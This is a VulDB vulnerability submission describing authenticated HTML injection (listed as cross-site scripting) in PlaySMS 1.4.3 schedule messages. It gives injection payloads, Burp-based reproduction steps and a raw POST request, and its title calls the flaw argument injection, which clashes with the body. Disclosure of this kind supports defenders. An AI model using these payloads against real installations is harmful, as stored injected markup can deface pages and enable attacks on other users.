Submit #347385: playsms 1.4.3 Argument Injectioninfo

Titleplaysms 1.4.3 Argument Injection
DescriptionPlaySMS 1.4.3 has authenticated HTML Injection in schedule messages Payloads: <br><h1> Olá </h1></br> <div style="background-image: url('https://cdn.donmai.us/sample/db/87/__yoru_chainsaw_man_drawn_by_ateoyh__sample-db87b0589605724a7b121afc2fe03a82.jpg'); width: 1000px; height: 1000px;"></div> PoC 1. Authenticate in login page http://x.x.x.x/playsms/index.php?app=main&inc=core_auth&route=login 2. Click in My Account > Schedule messages (/index.php?app=main&inc=feature_schedule&op=list) 3. Click in Add SMS schedule 4. Intercept with burp and add payload <br><h1> Olá </h1></br> in "name" and "message" field 5. Save and back to http://x.x.x.x/playsms/index.php?app=main&inc=feature_schedule&op=list -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- POST /playsms/index.php?app=main&inc=feature_schedule&route=edit&op=edit_yes HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 177 Origin: http://x.x.x.x Connection: keep-alive Referer: http://x.x.x.x/playsms/index.php?app=main&inc=feature_schedule&route=edit&op=list&id=2 Cookie: main_config_last_tab=%23tabs-site-configuration; PHPSESSID=9a0e3569hordkgjqma5qknmli3 Upgrade-Insecure-Requests: 1 X-CSRF-Token=5f6490434b82ce1fbc84b34a01a513f4&id=2&name=%3Cbr%3E%3Ch1%3E+Ol%C3%A1+%3C%2Fh1%3E%3C%2Fbr%3E&message=%3Cbr%3E%3Ch1%3E+Ol%C3%A1+%3C%2Fh1%3E%3C%2Fbr%3E&schedule_rule=0 -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Ref: https://playsms.org
Source⚠️ http://x.x.x.x/playsms/index.php?app=main&inc=feature_schedule&op=list
User
 Dhimitri (UID 45045)
Submission05/30/2024 07:56 PM (8 months ago)
Moderation06/11/2024 01:29 PM (12 days later)
StatusAccepted
VulDB Entry267912 [playSMS up to 1.4.7 SMS Schedule index.php?app=main&inc=feature_schedule&op=list name/message cross site scripting]
Points20

Do you know our Splunk app?

Download it now for free!